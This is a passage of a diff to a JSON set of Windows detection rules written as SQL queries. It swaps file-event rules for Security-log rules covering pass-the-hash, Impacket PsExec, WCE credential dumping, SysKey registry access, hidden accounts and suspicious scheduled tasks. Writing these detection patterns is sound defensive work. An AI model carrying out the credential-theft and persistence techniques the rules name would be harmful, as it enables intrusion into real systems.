"status": "experimental", - "description": "Detects programs on a Windows system that should not write scripts to disk", - "author": "frack113, Florian Roth", + "title": "Malicious Service Installations", + "id": "cb062102-587e-4414-8efa-dbe3c7bf19c6", + "status": "test", + "description": "Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities.", + "author": "Florian Roth (Nextron Systems), Daniil Yugoslavskiy, oscd.community (update)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1003", + "car.2013-09-005", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\visio.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\finger.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.scf' ESCAPE '\\' OR TargetFilename LIKE '%.wsf' ESCAPE '\\' OR TargetFilename LIKE '%.wsh' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceName = 'javamtsup')" ], - "filename": "file_event_win_legitimate_app_dropping_script.yml" + "filename": "win_security_mal_service_installs.yml" }, { - "title": "Office Macro File Download", - "id": "0e29e3a7-1ad8-40aa-b691-9f82ecd33d66", - "status": "experimental", - "description": "Detects the creation of a new office macro files on the systems via an application (browser, mail client).", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Windows Network Access Suspicious desktop.ini Action", + "id": "35bc7e28-ee6b-492f-ab04-da58fcf6402e", + "status": "test", + "description": "Detects unusual processes accessing desktop.ini remotely over network share, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.", + "author": "Tim Shelton (HAWK.IO)", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.persistence", + "attack.t1547.009" ], "falsepositives": [ - "Legitimate macro files downloaded from the internet", - "Legitimate macro files sent as attachemnts via emails" + "Read only access list authority" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thunderbird.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\HxOutlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\iexplorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\microsoftedgecp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\') AND ((TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.potm' ESCAPE '\\' OR TargetFilename LIKE '%.pptm' ESCAPE '\\') OR (TargetFilename LIKE '%.docm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dotm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xltm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.potm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.pptm:Zone%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ObjectType = 'File' AND RelativeTargetName LIKE '%\\\\desktop.ini' ESCAPE '\\' AND (AccessList LIKE '%WriteData%' ESCAPE '\\' OR AccessList LIKE '%DELETE%' ESCAPE '\\' OR AccessList LIKE '%WriteDAC%' ESCAPE '\\' OR AccessList LIKE '%AppendData%' ESCAPE '\\' OR AccessList LIKE '%AddSubdirectory%' ESCAPE '\\'))" ], - "filename": "file_event_win_office_macro_files_downloaded.yml" + "filename": "win_security_net_share_obj_susp_desktop_ini.yml" }, { - "title": "Suspicious File Event With Teams Objects", - "id": "6902955a-01b7-432c-b32a-6f5f81d8f624", - "status": "experimental", - "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", - "author": "@SerkinValery", + "title": "Pass the Hash Activity 2", + "id": "8eef149c-bd26-49f2-9e5a-9b00e3af499b", + "status": "stable", + "description": "Detects the attack technique pass the hash which is used to move laterally inside the network", + "author": "Dave Kennedy, Jeff Warren (method) / David Vassallo (rule)", "tags": [ - "attack.credential_access", - "attack.t1528" + "attack.lateral_movement", + "attack.t1550.002" ], "falsepositives": [ - "Unknown" + "Administrator activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4624' AND SubjectUserSid = 'S-1-0-0' AND LogonType = '3' AND LogonProcessName = 'NtLmSsp' AND KeyLength = '0') OR (EventID = '4624' AND LogonType = '9' AND LogonProcessName = 'seclogo')) AND NOT (TargetUserName = 'ANONYMOUS LOGON'))" ], - "filename": "file_event_win_access_susp_teams.yml" + "filename": "win_security_pass_the_hash_2.yml" }, { - "title": "Office Macro File Creation From Suspicious Process", - "id": "b1c50487-1967-4315-a026-6491686d860e", - "status": "experimental", - "description": "Detects the creation of a office macro file from a a suspicious process", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "title": "Windows Pcap Drivers", + "id": "7b687634-ab20-11ea-bb37-0242ac130002", + "status": "test", + "description": "Detects Windows Pcap driver installation based on a list of associated .sys files.", + "author": "Cian Heasley", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.discovery", + "attack.credential_access", + "attack.t1040" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\')) AND (TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.potm' ESCAPE '\\' OR TargetFilename LIKE '%.pptm' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%pcap%' ESCAPE '\\' OR ServiceFileName LIKE '%npcap%' ESCAPE '\\' OR ServiceFileName LIKE '%npf%' ESCAPE '\\' OR ServiceFileName LIKE '%nm3%' ESCAPE '\\' OR ServiceFileName LIKE '%ndiscap%' ESCAPE '\\' OR ServiceFileName LIKE '%nmnt%' ESCAPE '\\' OR ServiceFileName LIKE '%windivert%' ESCAPE '\\' OR ServiceFileName LIKE '%USBPcap%' ESCAPE '\\' OR ServiceFileName LIKE '%pktmon%' ESCAPE '\\'))" ], - "filename": "file_event_win_office_macro_files_from_susp_process.yml" + "filename": "win_security_pcap_drivers.yml" }, { - "title": "Suspicious Get-Variable.exe Creation", - "id": "0c3fac91-5627-46e8-a6a8-a0d7b9b8ae1b", + "title": "Replay Attack Detected", + "id": "5a44727c-3b85-4713-8c44-4401d5499629", "status": "experimental", - "description": "Get-Variable is a valid PowerShell cmdlet\nWindowsApps is by default in the path where PowerShell is executed.\nSo when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.\n", + "description": "Detects possible Kerberos Replay Attack on the domain controllers when \"KRB_AP_ERR_REPEAT\" Kerberos response is sent to the client", "author": "frack113", - "tags": [ - "attack.persistence", - "attack.t1546", - "attack.defense_evasion", - "attack.t1027" - ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%Local\\\\Microsoft\\\\WindowsApps\\\\Get-Variable.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4649')" ], - "filename": "file_event_win_susp_get_variable.yml" + "filename": "win_security_replay_attack_detected.yml" }, { - "title": "Files With System Process Name In Unsuspected Locations", - "id": "d5866ddf-ce8f-4aea-b28e-d96485a20d3d", + "title": "SysKey Registry Keys Access", + "id": "9a4ff3b8-6187-4fd2-8e8b-e0eae1129495", "status": "test", - "description": "Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64...etc).", - "author": "Sander Wiebing, Tim Shelton, Nasreddine Bencherchali", + "description": "Detects handle requests and access operations to specific registry keys to calculate the SysKey", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.defense_evasion", - "attack.t1036.005" + "attack.discovery", + "attack.t1012" ], "falsepositives": [ - "System processes copied outside their default folders for testing purposes", - "Third party software naming their software with the same names as the processes mentioned here" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AtBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\audiodg.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\backgroundTaskHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cmdl32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\conhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\csrss.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dasHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dfrgui.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dwm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\eventcreate.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\explorer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\extrac32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fontdrvhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\iscsicli.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\iscsicpl.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\logman.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\LogonUI.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\LsaIso.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\msinfo32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\nbtstat.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\powershell.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\regini.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchFilterHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchIndexer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchProtocolHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SecurityHealthService.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SecurityHealthSystray.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\services.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ShellAppRuntime.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sihost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\smss.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\svchost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SystemSettingsBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Taskmgr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TiWorker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\w32tm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WerFaultSecure.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wermgr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wininit.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\winrshost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinRTNetMUAHostServer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wlrmdr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wslhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WSReset.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WUDFHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WWAHost.exe' ESCAPE '\\') AND NOT (((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR TargetFilename LIKE '\\\\SystemRoot\\\\System32\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\Windows\\\\System32\\\\dism.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\%' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\SetupHost.exe' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\wbengine.exe' ESCAPE '\\') OR (NewProcessName LIKE '%:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bcdedit.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:Program Files\\\\WindowsApps\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\SecurityHealth\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\SecurityHealthSystray.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\SecurityHealthSetup.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663') AND ObjectType = 'key' AND (ObjectName LIKE '%lsa\\\\JD' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\GBG' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\Skew1' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\Data' ESCAPE '\\'))" ], - "filename": "file_event_win_creation_system_file.yml" + "filename": "win_security_syskey_registry_access.yml" }, { - "title": "Potential Privilege Escalation Attempt Via .Exe.Local Technique", - "id": "07a99744-56ac-40d2-97b7-2095967b0e03", - "status": "experimental", - "description": "Detects potential privilege escalation attempt via the creation of the \"*.Exe.Local\" folder inside the \"System32\" directory in order to sideload \"comctl32.dll\"", - "author": "Nasreddine Bencherchali (Nextron Systems), Subhash P (@pbssubhash)", + "title": "Impacket PsExec Execution", + "id": "32d56ea1-417f-44ff-822b-882873f5f43b", + "status": "test", + "description": "Detects execution of Impacket's psexec.py.", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\logonUI.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\werFault.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\narrator.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wermgr.exe.local%' ESCAPE '\\') AND TargetFilename LIKE '%\\\\comctl32.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND (RelativeTargetName LIKE '%RemCom\\_stdin%' ESCAPE '\\' OR RelativeTargetName LIKE '%RemCom\\_stdout%' ESCAPE '\\' OR RelativeTargetName LIKE '%RemCom\\_stderr%' ESCAPE '\\'))" ], - "filename": "file_event_win_system32_local_folder_privilege_escalation.yml" + "filename": "win_security_impacket_psexec.yml" }, { - "title": "TeamViewer Remote Session", - "id": "162ab1e4-6874-4564-853c-53ec3ab8be01", + "title": "WCE wceaux.dll Access", + "id": "1de68c67-af5c-4097-9c85-fe5578e09e67", "status": "test", - "description": "Detects the creation of log files during a TeamViewer remote session", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.command_and_control", - "attack.t1219" - ], - "falsepositives": [ - "Legitimate uses of TeamViewer in an organisation" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\TeamViewer\\\\RemotePrinting\\\\tvprint.db' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TeamViewer\\\\TVNetwork.log' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\TeamViewer%' ESCAPE '\\' AND TargetFilename LIKE '%\\_Logfile.log%' ESCAPE '\\'))" - ], - "filename": "file_event_win_susp_teamviewer_remote_session.yml" - }, - { - "title": "Creation Of Non-Existent System DLL", - "id": "df6ecb8b-7822-4f4b-b412-08f524b4576c", - "status": "experimental", - "description": "Detects the creation of system dlls that are not present on the system. Usually to achieve dll hijacking", - "author": "Nasreddine Bencherchali (Nextron Systems), fornotes", + "description": "Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host", + "author": "Thomas Patzke", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.credential_access", + "attack.t1003", + "attack.s0005" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\WLBSCTRL.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\TSMSISrv.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\TSVIPSrv.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wow64log.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\WptsExtensions.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') OR TargetFilename LIKE '%\\\\SprintCSP.dll' ESCAPE '\\') AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4658', '4660', '4663') AND ObjectName LIKE '%\\\\wceaux.dll' ESCAPE '\\')" ], - "filename": "file_event_win_create_non_existent_dlls.yml" + "filename": "win_security_mal_wceaux_dll.yml" }, { - "title": "Creation of an WerFault.exe in Unusual Folder", - "id": "28a452f3-786c-4fd8-b8f2-bddbe9d616d1", - "status": "experimental", - "description": "Detects WerFault copoed to a suspicious folder, which could be a sign of WerFault DLL hijacking", - "author": "frack113", + "title": "Hidden Local User Creation", + "id": "7b449a5e-1db5-4dd0-a2dc-4e3a67282538", + "status": "test", + "description": "Detects the creation of a local hidden user account which should not happen for event ID 4720.", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.persistence", - "attack.defense_evasion", - "attack.t1574.001" + "attack.t1136.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wer.dll' ESCAPE '\\') AND NOT ((TargetFilename LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinSxS\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720' AND TargetUserName LIKE '%$' ESCAPE '\\')" ], - "filename": "file_event_win_werfault_dll_hijacking.yml" + "filename": "win_security_hidden_user_creation.yml" }, { - "title": "Potential RipZip Attack on Startup Folder", - "id": "a6976974-ea6f-4e97-818e-ea08625c52cb", + "title": "Account Tampering - Suspicious Failed Logon Reasons", + "id": "9eb99343-d336-4020-a3cd-67f3819e68ee", "status": "experimental", - "description": "Detects a phishing attack which expands a ZIP file containing a malicious shortcut.\nIf the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder.\nAdditionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.\n", - "author": "Greg (rule)", + "description": "This method uses uncommon error codes on failed logons to determine suspicious activity and tampering with accounts that have been disabled or somehow restricted.", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1547" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.initial_access", + "attack.t1078" ], "falsepositives": [ - "Unknown" + "User using a disabled account" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup%' ESCAPE '\\' AND TargetFilename LIKE '%.lnk.{0AFACED1-E828-11D1-9187-B532F1E9575D}%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4625', '4776') AND Status IN ('0xC0000072', '0xC000006F', '0xC0000070', '0xC0000413', '0xC000018C', '0xC000015B')) AND NOT (SubjectUserSid = 'S-1-0-0'))" ], - "filename": "file_event_win_ripzip_attack.yml" + "filename": "win_security_susp_failed_logon_reasons.yml" }, { - "title": "Potential Startup Shortcut Persistence Via PowerShell.EXE", - "id": "92fa78e7-4d39-45f1-91a3-8b23f3f1088d", + "title": "Suspicious Scheduled Task Creation", + "id": "3a734d25-df5c-4b99-8034-af1ddb5883a4", "status": "experimental", - "description": "Detects PowerShell writing startup shortcuts.\nThis procedure was highlighted in Red Canary Intel Insights Oct. 2021, \"We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence.\nAccordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats.\nIn the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL\"\n", - "author": "Christopher Peacock '@securepeacock', SCYTHE", + "description": "Detects suspicious scheduled task creation events. Based on attributes such as paths, commands line flags, etc.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", + "attack.privilege_escalation", "attack.persistence", - "attack.t1547.001" + "attack.t1053.005" ], "falsepositives": [ - "Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%\\\\start menu\\\\programs\\\\startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.lnk' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4698' AND (TaskContent LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\') AND (TaskContent LIKE '%regsvr32%' ESCAPE '\\' OR TaskContent LIKE '%rundll32%' ESCAPE '\\' OR TaskContent LIKE '%cmd.exe%' ESCAPE '\\' OR TaskContent LIKE '%cmd%' ESCAPE '\\' OR TaskContent LIKE '%/c %' ESCAPE '\\' OR TaskContent LIKE '%/k %' ESCAPE '\\' OR TaskContent LIKE '%/r %' ESCAPE '\\' OR TaskContent LIKE '%powershell%' ESCAPE '\\' OR TaskContent LIKE '%pwsh%' ESCAPE '\\' OR TaskContent LIKE '%mshta%' ESCAPE '\\' OR 